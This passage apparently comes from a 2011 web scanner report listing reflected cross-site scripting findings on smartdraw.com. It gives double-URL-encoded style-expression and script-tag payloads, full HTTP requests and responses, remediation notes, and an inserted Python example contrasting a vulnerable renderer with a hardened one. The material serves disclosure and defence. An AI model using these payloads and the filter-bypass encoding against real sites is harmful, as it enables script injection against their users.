The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 was submitted in the REST URL parameter 2. This input was echoed as 20991"style="x:expression(alert(1))"284b0792e42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support/x2220991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oo5bbiaclrpecvf51w0jwaml; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.198. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /support/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396ed"style%3d"x%3aexpression(alert(1))"eac095684e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 396ed"style="x:expression(alert(1))"eac095684e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /support/x22?396ed"style%3d"x%3aexpression(alert(1))"eac095684e0=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:49 GMT
Content-Length: 8781
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2smue255v4gtmz55m2l3rh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.199. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /support/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79e74"style="x:expression(alert(1))"af3d991af1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /support/x22?79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oc0z2245wuz2afzvjdfzixel; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b was submitted in the REST URL parameter 1. This input was echoed as 68b35"style="x:expression(alert(1))"d2a8b1b996b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1y4wau550cpob2bb3amrf145; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321 was submitted in the REST URL parameter 1. This input was echoed as fc351"style="x:expression(alert(1))"46b2268b321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:59 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=twmrveyjx5im0l30e30blh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec was submitted in the REST URL parameter 2. This input was echoed as 5fc3f"style="x:expression(alert(1))"219d68a09ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training/5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 8746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wufgse55k2kojwaw3jekff45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
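The following is an added example, not code from the original report or from smartdraw.com, that reproduces the two defects the findings above describe (a character blocklist applied to the once-decoded URL before a redundant second URL-decode, and the decoded value copied into a double-quoted attribute without encoding) and shows the hardened ordering: canonicalise once, validate the canonical value, attribute-encode on output. The page template, function names and the blocklist are assumptions; the two payloads are constructed in the same shape as the ones the scanner submitted.

```python
# Added example (not from the original report or smartdraw.com's code).
# Reproduces the two defects behind the findings above and a hardened version:
#  1. the blocklist runs on the once-decoded URL, but the value is URL-decoded a
#     second time afterwards, so %253c / %2522 (< and " encoded twice) get through;
#  2. the decoded value is copied into a double-quoted HTML attribute without
#     attribute encoding, so a single " closes the attribute.
# The page template, function names and the blocklist itself are assumptions.
from html import escape
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import unquote

BLOCKED = ('<', '>', '"', "'")

# Constructed payloads using the same shapes the scanner reported.
PAYLOAD_STYLE = '%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522'
PAYLOAD_SCRIPT = '%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e'


def server_decode(raw_path: str) -> str:
    """The web server URL-decodes the request path once before the app sees it."""
    return unquote(raw_path)


def blocklist_passes(value: str) -> bool:
    """A character blocklist of the kind the report says the application applies."""
    return not any(c in value for c in BLOCKED)


def canonicalise(value: str, max_passes: int = 3) -> str:
    """URL-decode until the value stops changing (bounded so hostile input cannot loop forever)."""
    for _ in range(max_passes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def vulnerable_render(raw_path: str) -> Optional[str]:
    """Validate the once-decoded value, then decode again and embed it raw (the reported bug)."""
    once = server_decode(raw_path)
    if not blocklist_passes(once):
        return None                      # the filter only catches single-encoded payloads
    twice = unquote(once)                # the redundant second decode that undoes the check
    return f'<a href="{twice}">SmartDraw</a>'


def filter_on_canonical(raw_path: str) -> bool:
    """The report's ordering rule: validate only after all canonicalisation has happened."""
    return blocklist_passes(canonicalise(server_decode(raw_path)))


def hardened_render(raw_path: str) -> str:
    """Canonicalise, then attribute-encode on output; the encoding is the real control."""
    value = canonicalise(server_decode(raw_path))
    return f'<a href="{escape(value, quote=True)}">SmartDraw</a>'


class _TagCollector(HTMLParser):
    """Collects start tags and their attribute names, i.e. what a browser would parse."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.attr_names = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_names.setdefault(tag, [name for name, _ in attrs])


def anchor_attribute_names(markup: str) -> list:
    """Attribute names the parser assigns to the first <a> tag in markup."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.attr_names.get('a', [])


def contains_script_tag(markup: str) -> bool:
    """True if the parser sees a <script> start tag anywhere in markup."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return 'script' in p.tags


if __name__ == '__main__':
    print(vulnerable_render(PAYLOAD_STYLE))   # a second attribute, style=..., appears on the anchor
    print(hardened_render(PAYLOAD_STYLE))     # the quotes are entity-encoded, nothing breaks out
```

Run it and the vulnerable renderer emits an anchor carrying a `style` attribute (and a `<script>` element for the second payload), while the hardened renderer emits a single `href` whose quotes and angle brackets are entity-encoded. `filter_on_canonical` shows that the report's own ordering rule, validating after canonicalisation, would also have rejected the double-encoded payload; the blocklist is kept only to make that ordering point, since attribute encoding at output is what makes the reflection safe whatever the filter does.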
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc was submitted in the REST URL parameter 2. This input was echoed as f20b1"style="x:expression(alert(1))"35c6b1442fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training/x22f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:06 GMT
Content-Length: 8767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b52255als5xnh545vc0uboia; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.204. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/training/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccf51"style="x:expression(alert(1))"a72e20bf002 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /training/x22?ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fd1day3lcgnbupjb3jzkvr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.205. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/training/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4b27"style="x:expression(alert(1))"b6d7f14376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /training/x22?e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4jdjcurlf30fkz4530xla555; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 was submitted in the REST URL parameter 3. This input was echoed as 20ea8"style="x:expression(alert(1))"ea712677564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/index.htm20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ioghgr45ccy40ubwykcs3pan; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa was submitted in the REST URL parameter 3. This input was echoed as d00fd"style="x:expression(alert(1))"37b4fa705aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=iffsvl2yty0fiq3algupkl55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31 was submitted in the REST URL parameter 3. This input was echoed as 7ebb1"><script>alert(1)</script>7f63dfd6d31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/index.htm7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31?id=340836/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yawesm55knbvl4mobfmyjr2e; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8921
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b was submitted in the REST URL parameter 3. This input was echoed as 579d3"><script>alert(1)</script>136f2be723b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b?id=340836/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:57 GMT
Content-Length: 8928
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fzzorg45tqhtbe455jbn02zs; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c was submitted in the REST URL parameter 1. This input was echoed as 81e6e"style="x:expression(alert(1))"30c796e241c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
